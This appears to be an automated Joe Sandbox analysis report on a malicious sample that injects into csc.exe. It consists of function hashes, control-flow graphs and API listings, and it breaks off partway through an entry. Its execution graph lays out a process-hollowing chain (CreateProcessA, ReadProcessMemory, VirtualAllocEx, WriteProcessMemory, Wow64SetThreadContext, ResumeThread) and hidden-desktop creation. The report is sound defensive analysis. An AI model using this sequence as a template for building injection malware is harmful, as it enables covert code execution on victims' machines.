                                    • Opcode ID: 93b0f24386343b23968f1dd4614e447d5e13f6422e0b7557b4f4ba7a94d9471b
                                    • Instruction ID: f25eff7afa05845c9b1ac322673b08e895f1f9c358c8b3dab8c6cd0b8c56c7f3
                                    • Opcode Fuzzy Hash: 93b0f24386343b23968f1dd4614e447d5e13f6422e0b7557b4f4ba7a94d9471b
                                    • Instruction Fuzzy Hash: 427189B1905218DAEB218B20DC887EAB375FF99310F5081EAD50D9B390E7395EC1CF56
                                    Function 007EF5A1 Relevance: .2, Instructions: 178COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d0fcb31fda13efb35360ab1395232c69d920fc58a9bd4b41169081f44a0c6411
                                    • Instruction ID: 5842e22a0b52710cd4f90cc7e0f92c7eeeaf16333ce5aa459dd49d7e3dde9da1
                                    • Opcode Fuzzy Hash: d0fcb31fda13efb35360ab1395232c69d920fc58a9bd4b41169081f44a0c6411
                                    • Instruction Fuzzy Hash: DB61A3B5E091688BEB248B15DC946EAB775EF89314F1041FAE40D66A80E33C5FC5CB52
                                    Function 007EED82 Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe9397a7592cb5791e59a69ac8db6884c4c6904243ab705aa3243c03c2326f34
                                    • Instruction ID: f11017001d3ed237da5a11ee728beef63ba95067077bdce29313bab3a2d1f888
                                    • Opcode Fuzzy Hash: fe9397a7592cb5791e59a69ac8db6884c4c6904243ab705aa3243c03c2326f34
                                    • Instruction Fuzzy Hash: 0651D2B1D011689AEB248B12DC956FAB3B5EF85310F5080FAE90D57680E63C5FC1CF66
                                    Function 004353C6 Relevance: .1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7102f77ce3665209714b6eac27fd5dde86c060056710aa8567219f6673810444
                                    • Instruction ID: 14a33a121c5bec8adc22226229b69edff0d7146006be33f134681301f854a51b
                                    • Opcode Fuzzy Hash: 7102f77ce3665209714b6eac27fd5dde86c060056710aa8567219f6673810444
                                    • Instruction Fuzzy Hash: 1451D4A1D046269AE7348B25DC80BFBB675EF98304F1091FBD80D67680E7394AC2CF55

                                    Execution Graph

                                    Execution Coverage:25.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:3.2%
                                    Total number of Nodes:94
                                    Total number of Limit Nodes:3
                                    execution_graph 4205 5824800 4206 5824855 CreateDesktopA 4205->4206 4208 58248f8 4206->4208 4209 5820848 4210 5820849 4209->4210 4211 5820aa4 4210->4211 4216 5823011 4210->4216 4226 5822c6c 4210->4226 4238 5822c78 4210->4238 4250 5822f64 4210->4250 4217 5822fb8 4216->4217 4217->4216 4220 5823011 15 API calls 4217->4220 4221 5822f64 15 API calls 4217->4221 4222 5822c78 15 API calls 4217->4222 4223 5822c6c 15 API calls 4217->4223 4218 58233e4 4218->4211 4219 582323a 4219->4218 4260 5824b20 4219->4260 4264 5824b10 4219->4264 4220->4219 4221->4219 4222->4219 4223->4219 4227 5822c78 4226->4227 4227->4227 4228 5822e7c CreateProcessA 4227->4228 4229 5822ed9 4228->4229 4234 5823011 14 API calls 4229->4234 4235 5822f64 14 API calls 4229->4235 4236 5822c78 14 API calls 4229->4236 4237 5822c6c 14 API calls 4229->4237 4230 58233e4 4230->4211 4231 582323a 4231->4230 4232 5824b10 13 API calls 4231->4232 4233 5824b20 13 API calls 4231->4233 4232->4230 4233->4230 4234->4231 4235->4231 4236->4231 4237->4231 4239 5822c7d 4238->4239 4239->4239 4240 5822e7c CreateProcessA 4239->4240 4241 5822ed9 4240->4241 4246 5823011 14 API calls 4241->4246 4247 5822f64 14 API calls 4241->4247 4248 5822c78 14 API calls 4241->4248 4249 5822c6c 14 API calls 4241->4249 4242 58233e4 4242->4211 4243 582323a 4243->4242 4244 5824b10 13 API calls 4243->4244 4245 5824b20 13 API calls 4243->4245 4244->4242 4245->4242 4246->4243 4247->4243 4248->4243 4249->4243 4251 5822f6c 4250->4251 4256 5823011 15 API calls 4251->4256 4257 5822f64 15 API calls 4251->4257 4258 5822c78 15 API calls 4251->4258 4259 5822c6c 15 API calls 4251->4259 4252 58233e4 4252->4211 4253 582323a 4253->4252 4254 5824b10 13 API calls 4253->4254 4255 5824b20 13 API calls 4253->4255 4254->4252 4255->4252 4256->4253 4257->4253 4258->4253 4259->4253 4261 5824b25 4260->4261 4262 5824b6b 4261->4262 4268 58258d8 4261->4268 4262->4218 4265 5824b20 4264->4265 4266 5824b6b 4265->4266 4267 58258d8 13 API calls 4265->4267 4266->4218 4267->4265 4269 5825917 4268->4269 4298 5825540 4269->4298 4302 582516c 4269->4302 4270 5825a36 4274 5825d35 4270->4274 4283 5822850 Wow64SetThreadContext 4270->4283 4284 5822858 Wow64SetThreadContext 4270->4284 4271 5825a94 4271->4274 4296 5822ae0 ReadProcessMemory 4271->4296 4297 5822ad8 ReadProcessMemory 4271->4297 4272 5825ae8 4272->4274 4287 5822930 VirtualAllocEx 4272->4287 4288 5822928 VirtualAllocEx 4272->4288 4273 5825b54 4273->4274 4279 58229f0 WriteProcessMemory 4273->4279 4280 58229e8 WriteProcessMemory 4273->4280 4274->4261 4275 5825c98 4294 58229f0 WriteProcessMemory 4275->4294 4295 58229e8 WriteProcessMemory 4275->4295 4276 5825bc6 4276->4274 4276->4275 4285 58229f0 WriteProcessMemory 4276->4285 4286 58229e8 WriteProcessMemory 4276->4286 4277 5825cc7 4277->4274 4281 5822850 Wow64SetThreadContext 4277->4281 4282 5822858 Wow64SetThreadContext 4277->4282 4278 5825d20 4278->4274 4291 5821a31 ResumeThread 4278->4291 4292 5821ad8 ResumeThread 4278->4292 4293 5821a38 ResumeThread 4278->4293 4279->4276 4280->4276 4281->4278 4282->4278 4283->4271 4284->4271 4285->4276 4286->4276 4287->4273 4288->4273 4291->4274 4292->4274 4293->4274 4294->4277 4295->4277 4296->4272 4297->4272 4299 58255d1 4298->4299 4299->4299 4300 5825744 CreateProcessA 4299->4300 4301 58257a1 4300->4301 4303 5825540 4302->4303 4303->4303 4304 5825744 CreateProcessA 4303->4304 4305 58257a1 4304->4305 4306 5824a48 4307 5824a90 CreateDesktopW 4306->4307 4309 5824ae9 4307->4309

                                    Executed Functions

                                    Function 05824800 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 499 5824800-5824861 501 5824863-582486d 499->501 502 582489a-58248f6 CreateDesktopA 499->502 501->502 503 582486f-5824871 501->503 509 58248f8-58248fe 502->509 510 58248ff-5824930 502->510 504 5824873-582487d 503->504 505 5824894-5824897 503->505 507 5824881-5824890 504->507 508 582487f 504->508 505->502 507->507 511 5824892 507->511 508->507 509->510 514 5824932-5824936 510->514 515 5824940 510->515 511->505 514->515 516 5824938-582493b call 5820190 514->516 517 5824941 515->517 516->515 517->517
                                    APIs
                                    • CreateDesktopA.USER32(?,?,?,?,?,?,?), ref: 058248E6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: ea770e17f0d82a6acff13b7d31970cf0dc9d2854c83094911b9eff48418b20ca
                                    • Instruction ID: 365327a6dc636a8dd7a746eac3c859fa1c10b382ecac942045dfbf483ac27e63
                                    • Opcode Fuzzy Hash: ea770e17f0d82a6acff13b7d31970cf0dc9d2854c83094911b9eff48418b20ca
                                    • Instruction Fuzzy Hash: D1410171D102A99FDF10CFA9C885B9EBFF2FB48310F148129E815A7660D7759881CFA1
                                    Function 0582516C Relevance: 2.2, APIs: 1, Instructions: 748processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 582516c-58255dd 3 5825616-5825636 0->3 4 58255df-58255e9 0->4 9 5825638-5825642 3->9 10 582566f-582569e 3->10 4->3 5 58255eb-58255ed 4->5 7 5825610-5825613 5->7 8 58255ef-58255f9 5->8 7->3 11 58255fb 8->11 12 58255fd-582560c 8->12 9->10 14 5825644-5825646 9->14 18 58256a0-58256aa 10->18 19 58256d7-582579f CreateProcessA 10->19 11->12 12->12 13 582560e 12->13 13->7 15 5825648-5825652 14->15 16 5825669-582566c 14->16 20 5825656-5825665 15->20 21 5825654 15->21 16->10 18->19 22 58256ac-58256ae 18->22 32 58257a1-58257a7 19->32 33 58257a8-5825838 19->33 20->20 23 5825667 20->23 21->20 24 58256b0-58256ba 22->24 25 58256d1-58256d4 22->25 23->16 27 58256be-58256cd 24->27 28 58256bc 24->28 25->19 27->27 29 58256cf 27->29 28->27 29->25 32->33 42 582583a-582583e 33->42 43 5825848-582584c 33->43 42->43 44 5825840-5825843 call 5820190 42->44 45 582584e-5825852 43->45 46 582585c-5825860 43->46 44->43 45->46 48 5825854-5825857 call 5820190 45->48 49 5825862-5825866 46->49 50 5825870-5825874 46->50 48->46 49->50 52 5825868-582586b call 5820190 49->52 53 5825886-582588d 50->53 54 5825876-582587c 50->54 52->50 56 58258a4 53->56 57 582588f-582589e 53->57 54->53 59 58258a5 56->59 57->56 59->59
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0582578C
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 342cee3ab7771e6dd77be2814d7024ca1efc5fd93d0ecf9ce17c0e8f90b85018
                                    • Instruction ID: c85f34bd3ac0e6c2db7b912671b436b7a07c42e2b35a3cc0ec8c540cb00a049e
                                    • Opcode Fuzzy Hash: 342cee3ab7771e6dd77be2814d7024ca1efc5fd93d0ecf9ce17c0e8f90b85018
                                    • Instruction Fuzzy Hash: 9CA15A71D402299FDB20DFA9C845BEDBBB1BF48310F1485AAE819EA240DB749DC5CF91
                                    Function 05822C6C Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 60 5822c6c-5822c76 61 5822c78-5822c7c 60->61 62 5822c7d-5822d15 60->62 61->62 64 5822d17-5822d21 62->64 65 5822d4e-5822d6e 62->65 64->65 66 5822d23-5822d25 64->66 72 5822d70-5822d7a 65->72 73 5822da7-5822dd6 65->73 67 5822d27-5822d31 66->67 68 5822d48-5822d4b 66->68 70 5822d33 67->70 71 5822d35-5822d44 67->71 68->65 70->71 71->71 74 5822d46 71->74 72->73 75 5822d7c-5822d7e 72->75 79 5822dd8-5822de2 73->79 80 5822e0f-5822ed7 CreateProcessA 73->80 74->68 77 5822d80-5822d8a 75->77 78 5822da1-5822da4 75->78 81 5822d8e-5822d9d 77->81 82 5822d8c 77->82 78->73 79->80 83 5822de4-5822de6 79->83 93 5822ee0-5822f70 80->93 94 5822ed9-5822edf 80->94 81->81 84 5822d9f 81->84 82->81 85 5822de8-5822df2 83->85 86 5822e09-5822e0c 83->86 84->78 88 5822df6-5822e05 85->88 89 5822df4 85->89 86->80 88->88 90 5822e07 88->90 89->88 90->86 103 5822f72-5822f76 93->103 104 5822f80-5822f84 93->104 94->93 103->104 105 5822f78-5822f7b call 5820190 103->105 106 5822f86-5822f8a 104->106 107 5822f94-5822f98 104->107 105->104 106->107 109 5822f8c-5822f8f call 5820190 106->109 110 5822f9a-5822f9e 107->110 111 5822fa8-5822fac 107->111 109->107 110->111 113 5822fa0-5822fa3 call 5820190 110->113 114 5822fbe-5822fc5 111->114 115 5822fae-5822fb4 111->115 113->111 117 5822fc7-5822fd6 114->117 118 5822fdc-5823018 114->118 115->114 117->118 121 582301a-582301e 118->121 122 5822fb8-5822fbd 118->122 123 5823020-5823024 121->123 124 5823025-5823090 call 5821d18 121->124 122->114 123->124 132 5823092 124->132 133 58230a5-58230e3 124->133 232 5823094 call 5823878 132->232 233 5823094 call 5823869 132->233 140 58230e5-5823113 133->140 141 582311b-5823235 call 5821d24 133->141 134 582309a 134->133 140->141 236 5823238 call 5823011 141->236 237 5823238 call 5822f64 141->237 238 5823238 call 5822c78 141->238 239 5823238 call 5822c6c 141->239 162 582323a-58232a0 call 5821d30 174 58232a6-58233dc 162->174 175 58233e9-5823415 162->175 234 58233de call 5824b10 174->234 235 58233de call 5824b20 174->235 184 5823566-582356d 175->184 185 582341b-5823559 175->185 185->184 226 58233e4 226->184 232->134 233->134 234->226 235->226 236->162 237->162 238->162 239->162
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05822EC4
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 58d2eec8721014d36794faadccec58c5eed6a0c17b48a0d1985bdfd11db753ce
                                    • Instruction ID: 30d62c76b9c81e18f11852c243e32965d9ab1bca9e6561c4e9c4117e9cd162c2
                                    • Opcode Fuzzy Hash: 58d2eec8721014d36794faadccec58c5eed6a0c17b48a0d1985bdfd11db753ce
                                    • Instruction Fuzzy Hash: CAA15B75D002299FEB24DF69C841BEDBBB1BF48310F0485A9E81AF6240DB749D85CF91
                                    Function 05825540 Relevance: 1.8, APIs: 1, Instructions: 258processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 419 5825540-58255dd 421 5825616-5825636 419->421 422 58255df-58255e9 419->422 427 5825638-5825642 421->427 428 582566f-582569e 421->428 422->421 423 58255eb-58255ed 422->423 425 5825610-5825613 423->425 426 58255ef-58255f9 423->426 425->421 429 58255fb 426->429 430 58255fd-582560c 426->430 427->428 432 5825644-5825646 427->432 436 58256a0-58256aa 428->436 437 58256d7-582579f CreateProcessA 428->437 429->430 430->430 431 582560e 430->431 431->425 433 5825648-5825652 432->433 434 5825669-582566c 432->434 438 5825656-5825665 433->438 439 5825654 433->439 434->428 436->437 440 58256ac-58256ae 436->440 450 58257a1-58257a7 437->450 451 58257a8-5825838 437->451 438->438 441 5825667 438->441 439->438 442 58256b0-58256ba 440->442 443 58256d1-58256d4 440->443 441->434 445 58256be-58256cd 442->445 446 58256bc 442->446 443->437 445->445 447 58256cf 445->447 446->445 447->443 450->451 460 582583a-582583e 451->460 461 5825848-582584c 451->461 460->461 462 5825840-5825843 call 5820190 460->462 463 582584e-5825852 461->463 464 582585c-5825860 461->464 462->461 463->464 466 5825854-5825857 call 5820190 463->466 467 5825862-5825866 464->467 468 5825870-5825874 464->468 466->464 467->468 470 5825868-582586b call 5820190 467->470 471 5825886-582588d 468->471 472 5825876-582587c 468->472 470->468 474 58258a4 471->474 475 582588f-582589e 471->475 472->471 477 58258a5 474->477 475->474 477->477
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0582578C
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: fdc40b86fbe6bddcd5cbdb3d4374f1da16e37cb706bf832d516ec35a1ad7c0a2
                                    • Instruction ID: d81291041efd471ed948f5acf29df77ceb5e1e959fd43284927e73ea476548dd
                                    • Opcode Fuzzy Hash: fdc40b86fbe6bddcd5cbdb3d4374f1da16e37cb706bf832d516ec35a1ad7c0a2
                                    • Instruction Fuzzy Hash: 58A15A71D402299FDB20DFA9C845BEEBBB1BF48310F1485A9D819EA240DB749DC5CF91
                                    Function 05822C78 Relevance: 1.8, APIs: 1, Instructions: 258processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 240 5822c78-5822d15 243 5822d17-5822d21 240->243 244 5822d4e-5822d6e 240->244 243->244 245 5822d23-5822d25 243->245 251 5822d70-5822d7a 244->251 252 5822da7-5822dd6 244->252 246 5822d27-5822d31 245->246 247 5822d48-5822d4b 245->247 249 5822d33 246->249 250 5822d35-5822d44 246->250 247->244 249->250 250->250 253 5822d46 250->253 251->252 254 5822d7c-5822d7e 251->254 258 5822dd8-5822de2 252->258 259 5822e0f-5822ed7 CreateProcessA 252->259 253->247 256 5822d80-5822d8a 254->256 257 5822da1-5822da4 254->257 260 5822d8e-5822d9d 256->260 261 5822d8c 256->261 257->252 258->259 262 5822de4-5822de6 258->262 272 5822ee0-5822f70 259->272 273 5822ed9-5822edf 259->273 260->260 263 5822d9f 260->263 261->260 264 5822de8-5822df2 262->264 265 5822e09-5822e0c 262->265 263->257 267 5822df6-5822e05 264->267 268 5822df4 264->268 265->259 267->267 269 5822e07 267->269 268->267 269->265 282 5822f72-5822f76 272->282 283 5822f80-5822f84 272->283 273->272 282->283 284 5822f78-5822f7b call 5820190 282->284 285 5822f86-5822f8a 283->285 286 5822f94-5822f98 283->286 284->283 285->286 288 5822f8c-5822f8f call 5820190 285->288 289 5822f9a-5822f9e 286->289 290 5822fa8-5822fac 286->290 288->286 289->290 292 5822fa0-5822fa3 call 5820190 289->292 293 5822fbe-5822fc5 290->293 294 5822fae-5822fb4 290->294 292->290 296 5822fc7-5822fd6 293->296 297 5822fdc-5823018 293->297 294->293 296->297 300 582301a-582301e 297->300 301 5822fb8-5822fbd 297->301 302 5823020-5823024 300->302 303 5823025-5823090 call 5821d18 300->303 301->293 302->303 311 5823092 303->311 312 58230a5-58230e3 303->312 417 5823094 call 5823878 311->417 418 5823094 call 5823869 311->418 319 58230e5-5823113 312->319 320 582311b-5823235 call 5821d24 312->320 313 582309a 313->312 319->320 413 5823238 call 5823011 320->413 414 5823238 call 5822f64 320->414 415 5823238 call 5822c78 320->415 416 5823238 call 5822c6c 320->416 341 582323a-58232a0 call 5821d30 353 58232a6-58233dc 341->353 354 58233e9-5823415 341->354 411 58233de call 5824b10 353->411 412 58233de call 5824b20 353->412 363 5823566-582356d 354->363 364 582341b-5823559 354->364 364->363 405 58233e4 405->363 411->405 412->405 413->341 414->341 415->341 416->341 417->313 418->313
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05822EC4
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 9a3828c8bcd009ac59b5ae41f4b12f4553d94f93cf002b74c7628ad3b6dfc4e9
                                    • Instruction ID: 2347540ddb3ad664686465597dcd140b23b3ec63b4b82bdcfd040395613f29d8
                                    • Opcode Fuzzy Hash: 9a3828c8bcd009ac59b5ae41f4b12f4553d94f93cf002b74c7628ad3b6dfc4e9
                                    • Instruction Fuzzy Hash: 21A15B75D002299FEB24DFA9C841BEDBBB1FF48310F1485A9E81AE6240DB749D85CF91
                                    Function 058247F4 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 478 58247f4-5824861 481 5824863-582486d 478->481 482 582489a-58248f6 CreateDesktopA 478->482 481->482 483 582486f-5824871 481->483 489 58248f8-58248fe 482->489 490 58248ff-5824930 482->490 484 5824873-582487d 483->484 485 5824894-5824897 483->485 487 5824881-5824890 484->487 488 582487f 484->488 485->482 487->487 491 5824892 487->491 488->487 489->490 494 5824932-5824936 490->494 495 5824940 490->495 491->485 494->495 496 5824938-582493b call 5820190 494->496 497 5824941 495->497 496->495 497->497
                                    APIs
                                    • CreateDesktopA.USER32(?,?,?,?,?,?,?), ref: 058248E6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: 0457b839c5d6ad07d2f30cc789bc50e120e166f5bf7ee2dcf75537f3421eafe0
                                    • Instruction ID: 1d3521905ec4ccf89af58cfa8cd400e5cd187e6648036bc786d8efa6b3c57098
                                    • Opcode Fuzzy Hash: 0457b839c5d6ad07d2f30cc789bc50e120e166f5bf7ee2dcf75537f3421eafe0
                                    • Instruction Fuzzy Hash: C04122B1D102A99FDF11CFA9D885BDEBFF2BB08310F148129E815A7660C7759885CFA1
                                    Function 058229E8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 519 58229e8-58229ee 520 58229f0-58229f4 519->520 521 58229f5-5822a3e 519->521 520->521 523 5822a40-5822a4c 521->523 524 5822a4e-5822a8d WriteProcessMemory 521->524 523->524 526 5822a96-5822ac6 524->526 527 5822a8f-5822a95 524->527 527->526
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05822A80
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 518526fe93c8c79a22c4847a66ffe1bf3aa68c4509d70ca8141f272db0eb5bfa
                                    • Instruction ID: ff16c48a3a3c1f6dd68b1637e6b99133e7c3961398c42bde767e9457d3a045a1
                                    • Opcode Fuzzy Hash: 518526fe93c8c79a22c4847a66ffe1bf3aa68c4509d70ca8141f272db0eb5bfa
                                    • Instruction Fuzzy Hash: 05213775D003599FDB20CFA9C881BEEBBF5FF48320F508429E919A7640D7789941CBA0
                                    Function 058229F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 531 58229f0-5822a3e 534 5822a40-5822a4c 531->534 535 5822a4e-5822a8d WriteProcessMemory 531->535 534->535 537 5822a96-5822ac6 535->537 538 5822a8f-5822a95 535->538 538->537
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05822A80
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: a9ac4250a1f09eafc4d3b78c9a7e479bf30dd951e49205ddd1a06cb7c6bb152f
                                    • Instruction ID: 7934f106bebff807812d49f3d370fc71a5d875d897b2429a0f92418637a50b67
                                    • Opcode Fuzzy Hash: a9ac4250a1f09eafc4d3b78c9a7e479bf30dd951e49205ddd1a06cb7c6bb152f
                                    • Instruction Fuzzy Hash: 28212575D003599FDB20DFAAC881BEEBBF5FF48310F50842AE919A7240D7789944CBA4
                                    Function 05824A40 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 542 5824a40-5824a94 546 5824a96-5824a99 542->546 547 5824a9c-5824ae7 CreateDesktopW 542->547 546->547 548 5824af0-5824b0d 547->548 549 5824ae9-5824aef 547->549 549->548
                                    APIs
                                    • CreateDesktopW.USER32(00000000,?,?,?,?,?,?,?), ref: 05824ADA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: d6960fd84e9671d4b9e794024b2f8b119ea141fdd63f9419450844db61d48e5d
                                    • Instruction ID: 08332e7b907e417fd50fd549d535a64de6a3c29c7d4922fff5b9df92b22a689e
                                    • Opcode Fuzzy Hash: d6960fd84e9671d4b9e794024b2f8b119ea141fdd63f9419450844db61d48e5d
                                    • Instruction Fuzzy Hash: 9421F5B5D0121AAFCB10CF99D985ADEFFB4FF48320F10812AE919A3250C775A955CFA4
                                    Function 05822850 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 552 5822850-5822856 553 5822858-582285c 552->553 554 582285d-58228a3 552->554 553->554 556 58228b3-58228e3 Wow64SetThreadContext 554->556 557 58228a5-58228b1 554->557 559 58228e5-58228eb 556->559 560 58228ec-582291c 556->560 557->556 559->560
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058228D6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1ffe0b6397b0dec1b9f1b258a827f1c2f77f7c86f6f27f3fd054dd3ffa907cb9
                                    • Instruction ID: db3c44112c641774fa5818a3053c5399d505b7c5258cb0dd42cc1cdbe28ad51c
                                    • Opcode Fuzzy Hash: 1ffe0b6397b0dec1b9f1b258a827f1c2f77f7c86f6f27f3fd054dd3ffa907cb9
                                    • Instruction Fuzzy Hash: FA215975D003099FDB10DFAAC481BEEBBF4EF48320F548429D919A7640DB789986CFA5
                                    Function 05824A48 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 564 5824a48-5824a94 566 5824a96-5824a99 564->566 567 5824a9c-5824ae7 CreateDesktopW 564->567 566->567 568 5824af0-5824b0d 567->568 569 5824ae9-5824aef 567->569 569->568
                                    APIs
                                    • CreateDesktopW.USER32(00000000,?,?,?,?,?,?,?), ref: 05824ADA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: ba5d87b00c607acdbe152d52217b8111b93d72fecd07e566a55c4e6383ff4de3
                                    • Instruction ID: c0ce2394f102afe7f16d37b22997cda680c6089732633d6b8ff1f99b8220fda3
                                    • Opcode Fuzzy Hash: ba5d87b00c607acdbe152d52217b8111b93d72fecd07e566a55c4e6383ff4de3
                                    • Instruction Fuzzy Hash: 3021F0B5D0121AAFCB10CF99D984ADEFBB4FB08320F10812AE919A3250C775A955CFA4
                                    Function 05822AD8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 572 5822ad8-5822b6d ReadProcessMemory 576 5822b76-5822ba6 572->576 577 5822b6f-5822b75 572->577 577->576
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05822B60
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
